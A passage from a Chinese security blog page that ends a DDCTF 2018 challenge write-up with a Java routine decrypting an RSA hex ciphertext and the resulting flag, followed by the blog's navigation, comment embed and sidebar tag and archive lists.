cipher =Cipher.getInstance(<span class="hljs-string">"RSA"</span>);</span><br><span class="line">        cipher.init(<span class="hljs-number">2</span>, publicKey);</span><br><span class="line">        <span class="hljs-keyword">byte</span>[] result = cipher.doFinal(hex2byte(miwen.getBytes()));</span><br><span class="line">        System.out.println(<span class="hljs-keyword">new</span> String(result));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">byte</span>[] hex2byte(<span class="hljs-keyword">byte</span>[] b) &#123;  </span><br><span class="line">        <span class="hljs-keyword">if</span> ((b.length % <span class="hljs-number">2</span>) != <span class="hljs-number">0</span>)  </span><br><span class="line">            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> IllegalArgumentException(<span class="hljs-string">"长度不是偶数"</span>);  </span><br><span class="line">        <span class="hljs-keyword">byte</span>[] b2 = <span class="hljs-keyword">new</span> <span class="hljs-keyword">byte</span>[b.length / <span class="hljs-number">2</span>];  </span><br><span class="line">        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> n = <span class="hljs-number">0</span>; n &lt; b.length; n += <span class="hljs-number">2</span>) &#123;  </span><br><span class="line">            String item = <span class="hljs-keyword">new</span> String(b, n, <span class="hljs-number">2</span>);  </span><br><span class="line">            b2[n / <span class="hljs-number">2</span>] = (<span class="hljs-keyword">byte</span>) Integer.parseInt(item, <span class="hljs-number">16</span>);  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="hljs-keyword">return</span> b2;  </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;最后flag：<code>DDCTF{1797193649441981961}</code>。</p>
<p>&emsp;&emsp;考虑篇幅的原因，下题writeup重新开篇。</p>

        </div>
        
        
        
    </div>
</div>


<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2018/04/ddctf-writeup3/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">2018 DDCTF web 注入的奥妙 writeup</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2018/04/ddctf-writeup1/">
                <span class="level-item">2018 DDCTF 杂项 writeup</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<script>
    var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2018/04/ddctf-writeup2/';
        this.page.identifier = '2018/04/ddctf-writeup2/';
    };
    (function() {
        var d = document, s = d.createElement('script');  
        s.src = '//' + 'delcoding' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

<div id="disqus_thread">
    
    <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
    </div>
</div>
</div>
                



<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left">
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered">
                <div>
                    <img class="image is-128x128 has-mb-6" src="/images/avatar.png" alt="Junay">
                    
                    <p class="is-size-4 is-block">
                        Junay
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        Junay&#39;s blog
                    </p>
                    
                    
                    <p class="is-size-6 is-flex is-flex-center has-text-grey">
                        <i class="fas fa-map-marker-alt has-mr-7"></i>
                        <span>Shanghai</span>
                    </p>
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <p class="title has-text-weight-normal">
                        63
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <p class="title has-text-weight-normal">
                        2
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <p class="title has-text-weight-normal">
                        24
                    </p>
                </div>
            </div>
        </nav>
        <div class="level">
            <a class="level-item button is-link is-rounded" href="https://github.com/delcoding">
                关注我</a>
        </div>
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Github" href="https://github.com/delcoding">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Facebook" href="http://facebook.com">
                
                <i class="fab fa-facebook"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Twitter" href="http://twitter.com">
                
                <i class="fab fa-twitter"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="Dribbble" href="http://dribbble.com">
                
                <i class="fab fa-dribbble"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank"
                title="RSS" href="/">
                
                <i class="fas fa-rss"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        
    
        


    
        
<div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                分类
            </h3>
            <ul class="menu-list">
            <li>
        <a class="level is-marginless" href="/categories/CTF/">
            <span class="level-start">
                <span class="level-item">CTF</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">7</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/jekyll-update/">
            <span class="level-start">
                <span class="level-item">jekyll update</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">26</span>
            </span>
        </a></li>
            </ul>
        </div>
    </div>
</div>
    
        
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            标签云
        </h3>
        <a href="/tags/BROP/" style="font-size: 10px;">BROP</a> <a href="/tags/BlockChain/" style="font-size: 10px;">BlockChain</a> <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/CVE/" style="font-size: 16.67px;">CVE</a> <a href="/tags/Hack/" style="font-size: 10px;">Hack</a> <a href="/tags/Oracle/" style="font-size: 10px;">Oracle</a> <a href="/tags/blockchain/" style="font-size: 13.33px;">blockchain</a> <a href="/tags/bypass-pie/" style="font-size: 13.33px;">bypass pie</a> <a href="/tags/kali/" style="font-size: 13.33px;">kali</a> <a href="/tags/mongodb/" style="font-size: 10px;">mongodb</a> <a href="/tags/office/" style="font-size: 16.67px;">office</a> <a href="/tags/pwm/" style="font-size: 10px;">pwm</a> <a href="/tags/pwn/" style="font-size: 13.33px;">pwn</a> <a href="/tags/ret2dl-resolve/" style="font-size: 10px;">ret2dl_resolve</a> <a href="/tags/rop/" style="font-size: 10px;">rop</a> <a href="/tags/web3/" style="font-size: 10px;">web3</a> <a href="/tags/windows/" style="font-size: 10px;">windows</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/xammpp/" style="font-size: 10px;">xammpp</a> <a href="/tags/xdebug/" style="font-size: 10px;">xdebug</a> <a href="/tags/爬虫绕过/" style="font-size: 10px;">爬虫绕过</a> <a href="/tags/百度云/" style="font-size: 10px;">百度云</a> <a href="/tags/笔记/" style="font-size: 10px;">笔记</a> <a href="/tags/鹏程杯/" style="font-size: 10px;">鹏程杯</a>
    </div>
</div>

    
    
        <div class="card card-transparent is-hidden-widescreen">
        
            
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            最新文章
        </h3>
        
        <article class="media">
            
            <a href="/2019/01/small_stack_and_brop/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="x86下栈溢出太小和BROP">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-01-15T15:00:00.000Z">2019-01-15</time></div>
                    <a href="/2019/01/small_stack_and_brop/" class="has-link-black-ter is-size-6">x86下栈溢出太小和BROP</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/01/ret2dl_resolve_x86/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="ret2dl_resolve exp">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-01-01T16:00:00.000Z">2019-01-02</time></div>
                    <a href="/2019/01/ret2dl_resolve_x86/" class="has-link-black-ter is-size-6">ret2dl_resolve exp</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/dl_runtime_resolve/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="got/plt之_dl_runtime_resolve">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-05T13:03:56.000Z">2018-12-05</time></div>
                    <a href="/2018/12/dl_runtime_resolve/" class="has-link-black-ter is-size-6">got/plt之_dl_runtime_resolve</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/rop-study/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="x86 ROP study">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-03T14:05:56.000Z">2018-12-03</time></div>
                    <a href="/2018/12/rop-study/" class="has-link-black-ter is-size-6">x86 ROP study</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/pcb-writeup/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="PCB鹏程杯2018 writeup">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-02T14:05:56.000Z">2018-12-02</time></div>
                    <a href="/2018/12/pcb-writeup/" class="has-link-black-ter is-size-6">PCB鹏程杯2018 writeup</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
    </div>
</div>

        
            <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            归档
        </h3>
        <ul class="menu-list">
        
        <li>
            <a class="level is-marginless" href="/archives/2019/01/">
                <span class="level-start">
                    <span class="level-item">一月 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/12/">
                <span class="level-start">
                    <span class="level-item">十二月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">3</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/11/">
                <span class="level-start">
                    <span class="level-item">十一月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/10/">
                <span class="level-start">
                    <span class="level-item">十月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/09/">
                <span class="level-start">
                    <span class="level-item">九月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">5</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/06/">
                <span class="level-start">
                    <span class="level-item">六月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/05/">
                <span class="level-start">
                    <span class="level-item">五月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/04/">
                <span class="level-start">
                    <span class="level-item">四月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/03/">
                <span class="level-start">
                    <span class="level-item">三月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">13</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/02/">
                <span class="level-start">
                    <span class="level-item">二月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/01/">
                <span class="level-start">
                    <span class="level-item">一月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">3</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2017/12/">
                <span class="level-start">
                    <span class="level-item">十二月 2017</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2017/11/">
                <span class="level-start">
                    <span class="level-item">十一月 2017</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">9</span>
                </span>
            </a>
        </li>
        
        </ul>
        </div>
    </div>
</div>
        
            <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                标签
            </h3>
            <ul class="menu-list">
                
                <li>
                    <a class="level is-marginless" href="/tags/BROP/">
                        <span class="level-start">
                            <span class="level-item">BROP</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/BlockChain/">
                        <span class="level-start">
                            <span class="level-item">BlockChain</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/CTF/">
                        <span class="level-start">
                            <span class="level-item">CTF</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">18</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/CVE/">
                        <span class="level-start">
                            <span class="level-item">CVE</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">3</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/Hack/">
                        <span class="level-start">
                            <span class="level-item">Hack</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/Oracle/">
                        <span class="level-start">
                            <span class="level-item">Oracle</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/blockchain/">
                        <span class="level-start">
                            <span class="level-item">blockchain</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/bypass-pie/">
                        <span class="level-start">
                            <span class="level-item">bypass pie</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/kali/">
                        <span class="level-start">
                            <span class="level-item">kali</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/mongodb/">
                        <span class="level-start">
                            <span class="level-item">mongodb</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/office/">
                        <span class="level-start">
                            <span class="level-item">office</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">3</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/pwm/">
                        <span class="level-start">
                            <span class="level-item">pwm</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/pwn/">
                        <span class="level-start">
                            <span class="level-item">pwn</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/ret2dl-resolve/">
                        <span class="level-start">
                            <span class="level-item">ret2dl_resolve</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/rop/">
                        <span class="level-start">
                            <span class="level-item">rop</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/web3/">
                        <span class="level-start">
                            <span class="level-item">web3</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/windows/">
                        <span class="level-start">
                            <span class="level-item">windows</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/writeup/">
                        <span class="level-start">
                            <span class="level-item">writeup</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/xammpp/">
                        <span class="level-start">
                            <span class="level-item">xammpp</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/xdebug/">
                        <span class="level-start">
                            <span class="level-item">xdebug</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/爬虫绕过/">
                        <span class="level-start">
                            <span class="level-item">爬虫绕过</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/百度云/">
                        <span class="level-start">
                            <span class="level-item">百度云</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/笔记/">
                        <span class="level-start">
                            <span class="level-item">笔记</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/鹏程杯/">
                        <span class="level-start">
                            <span class="level-item">鹏程杯</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
            </ul>
        </div>
    </div>
</div>
        
        </div>
    
</div>

                



<div class="column is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only has-order-3 column-right">
    
        
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            最新文章
        </h3>
        
        <article class="media">
            
            <a href="/2019/01/small_stack_and_brop/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="x86下栈溢出太小和BROP">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-01-15T15:00:00.000Z">2019-01-15</time></div>
                    <a href="/2019/01/small_stack_and_brop/" class="has-link-black-ter is-size-6">x86下栈溢出太小和BROP</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/01/ret2dl_resolve_x86/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="ret2dl_resolve exp">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-01-01T16:00:00.000Z">2019-01-02</time></div>
                    <a href="/2019/01/ret2dl_resolve_x86/" class="has-link-black-ter is-size-6">ret2dl_resolve exp</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/dl_runtime_resolve/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="got/plt之_dl_runtime_resolve">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-05T13:03:56.000Z">2018-12-05</time></div>
                    <a href="/2018/12/dl_runtime_resolve/" class="has-link-black-ter is-size-6">got/plt之_dl_runtime_resolve</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/rop-study/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="x86 ROP study">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-03T14:05:56.000Z">2018-12-03</time></div>
                    <a href="/2018/12/rop-study/" class="has-link-black-ter is-size-6">x86 ROP study</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2018/12/pcb-writeup/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="PCB鹏程杯2018 writeup">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2018-12-02T14:05:56.000Z">2018-12-02</time></div>
                    <a href="/2018/12/pcb-writeup/" class="has-link-black-ter is-size-6">PCB鹏程杯2018 writeup</a>
                    <p class="is-size-7 is-uppercase">
                        
                    </p>
                </div>
            </div>
        </article>
        
    </div>
</div>

    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            归档
        </h3>
        <ul class="menu-list">
        
        <li>
            <a class="level is-marginless" href="/archives/2019/01/">
                <span class="level-start">
                    <span class="level-item">一月 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/12/">
                <span class="level-start">
                    <span class="level-item">十二月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">3</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/11/">
                <span class="level-start">
                    <span class="level-item">十一月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/10/">
                <span class="level-start">
                    <span class="level-item">十月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/09/">
                <span class="level-start">
                    <span class="level-item">九月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">5</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/06/">
                <span class="level-start">
                    <span class="level-item">六月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/05/">
                <span class="level-start">
                    <span class="level-item">五月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/04/">
                <span class="level-start">
                    <span class="level-item">四月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/03/">
                <span class="level-start">
                    <span class="level-item">三月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">13</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/02/">
                <span class="level-start">
                    <span class="level-item">二月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/01/">
                <span class="level-start">
                    <span class="level-item">一月 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">3</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2017/12/">
                <span class="level-start">
                    <span class="level-item">十二月 2017</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">6</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2017/11/">
                <span class="level-start">
                    <span class="level-item">十一月 2017</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">9</span>
                </span>
            </a>
        </li>
        
        </ul>
        </div>
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                标签
            </h3>
            <ul class="menu-list">
                
                <li>
                    <a class="level is-marginless" href="/tags/BROP/">
                        <span class="level-start">
                            <span class="level-item">BROP</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/BlockChain/">
                        <span class="level-start">
                            <span class="level-item">BlockChain</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/CTF/">
                        <span class="level-start">
                            <span class="level-item">CTF</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">18</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/CVE/">
                        <span class="level-start">
                            <span class="level-item">CVE</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">3</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/Hack/">
                        <span class="level-start">
                            <span class="level-item">Hack</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/Oracle/">
                        <span class="level-start">
                            <span class="level-item">Oracle</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/blockchain/">
                        <span class="level-start">
                            <span class="level-item">blockchain</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/bypass-pie/">
                        <span class="level-start">
                            <span class="level-item">bypass pie</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/kali/">
                        <span class="level-start">
                            <span class="level-item">kali</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/mongodb/">
                        <span class="level-start">
                            <span class="level-item">mongodb</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/office/">
                        <span class="level-start">
                            <span class="level-item">office</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">3</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/pwm/">
                        <span class="level-start">
                            <span class="level-item">pwm</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/pwn/">
                        <span class="level-start">
                            <span class="level-item">pwn</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">2</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/ret2dl-resolve/">
                        <span class="level-start">
                            <span class="level-item">ret2dl_resolve</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/rop/">
                        <span class="level-start">
                            <span class="level-item">rop</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/web3/">
                        <span class="level-start">
                            <span class="level-item">web3</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/windows/">
                        <span class="level-start">
                            <span class="level-item">windows</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/writeup/">
                        <span class="level-start">
                            <span class="level-item">writeup</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/xammpp/">
                        <span class="level-start">
                            <span class="level-item">xammpp</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/xdebug/">
                        <span class="level-start">
                            <span class="level-item">xdebug</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
                    <a class="level is-marginless" href="/tags/爬虫绕过/">
                        <span class="level-start">
                            <span class="level-item">爬虫绕过</span>
                        </span>
                        <span class="level-end">
                            <span class="level-item tag">1</span>
                        </span>
                    </a>
                </li>
                
                <li>
